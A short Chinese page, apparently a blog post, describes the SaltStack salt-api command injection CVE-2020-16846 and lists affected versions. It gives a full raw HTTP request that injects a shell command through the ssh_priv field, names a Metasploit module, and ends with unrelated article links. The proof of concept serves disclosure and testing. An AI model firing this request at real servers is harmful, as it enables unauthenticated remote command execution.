SaltStack 命令注入漏洞(CVE-2020-16846)
SaltStack 是基于 Python 开发的一套C/S架构配置管理工具。2020年11月SaltStack官方披露了CVE-2020-16846和CVE-2020-25592两个漏洞,其中CVE-2020-25592允许任意用户调用SSH模块,CVE-2020-16846允许用户执行任意命令。组合这两个漏洞,将可以使未授权的攻击者通过Salt
API执行任意命令
影响范围
SaltStack < 3002.1
SaltStack < 3001.3
SaltStack < 3000.5
SaltStack < 2019.2.7
POST /run HTTP/1.1
Host: 192.168.49.2:8000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/x-yaml
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 91
token=12312&client=ssh&tgt=*&fun=a&roster=whip1ash&ssh_priv=aaa|touch%20/tmp/success%3b
或者使用msf
use exploit/linux/http/saltstack_salt_api_cmd_exec
最新文章
- Java被忽略的基本知识(一)
- Java enum的用法详解
- BZOJ1036——树的统计count
- notepad++如何设置自动换行
- css margin居中的问题
- TMS320C54x系列DSP的CPU与外设——第2章 TMS320C54x DSP体系结构总体介绍
- 一种通用数据采集的schema定义形式
- Failure [INSTALL_FAILED_OLDER_SDK]
- gcc支持c99验证
- ThreadLocal中的WeakReference
- 内存映射mmap的几个api及其使用
- OS之进程管理---多线程模型和线程库(POSIX PTread)
- Java基础高级部分(一)
- Sublime Text 3 快捷键总结(拿走)
- js post下载相当于 location.href
- 斯坦福2011秋季 iPad and iPhone Application Development 资源
- Beta阶段——第1篇 Scrum 冲刺博客
- 01-TCP/IP概述
- Nvidia显卡安装驱动
- opencv中图像伪彩色处理(C++ / Python)
热门文章
- c 语言学习第一天
- JavaScript与服务端进行数据交互的方式
- 解决Git操作报错
- 温故知新,基于Nexus3和Docker搭建私有Docker Mirrors镜像库
- 关于Kubernetes(简称K8S)的开启及基本使用,基于Docker Desktop &; WSL2
- NuGet微软官方中国镜像地址
- 21、部署heartbeat
- js实现页面下拉,区块(文字,图片等)左右淡入淡出效果
- django 使用jpype 报错:raise+OSError(&#39;JVM+cannot+be+restarted&#39;)
- homestead